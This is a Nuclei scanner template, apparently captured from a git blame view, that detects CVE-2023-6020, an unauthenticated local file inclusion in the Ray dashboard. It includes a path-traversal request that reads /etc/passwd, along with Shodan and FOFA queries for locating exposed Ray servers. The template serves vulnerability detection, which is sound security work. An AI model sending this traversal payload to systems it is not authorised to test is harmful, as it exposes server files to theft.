2023-12-05 16:15:41 +00:00
|
|
|
id: CVE-2023-6020
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Ray Static File - Local File Inclusion
|
|
|
|
author: byt3bl33d3r
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.
|
|
|
|
reference:
|
|
|
|
- https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-6020
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2023-6020
|
2024-03-23 09:28:19 +00:00
|
|
|
cwe-id: CWE-862
|
|
|
|
epss-score: 0.06351
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-percentile: 0.93636
|
2023-12-05 16:36:30 +00:00
|
|
|
cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:*
|
2023-12-05 16:15:41 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
2023-12-12 11:07:52 +00:00
|
|
|
vendor: ray_project
|
|
|
|
product: ray
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- http.favicon.hash:463802404
|
|
|
|
- http.html:"ray dashboard"
|
|
|
|
fofa-query:
|
|
|
|
- body="ray dashboard"
|
|
|
|
- icon_hash=463802404
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2023,cve,lfi,ray,oos,ray_project
|
2023-12-05 16:15:41 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/octet-stream"
|
|
|
|
- "aiohttp"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4a0a004730450220016faf5d218a154c3f85462ee9932819b2423bfcb41ffda404b70dee337dd6b7022100e89b86ddec2eb7b76100a9561996bcb97cb09eb953888a2dc7890bf1b81e5f32:922c64590222798bb761d5b6d8e72950
|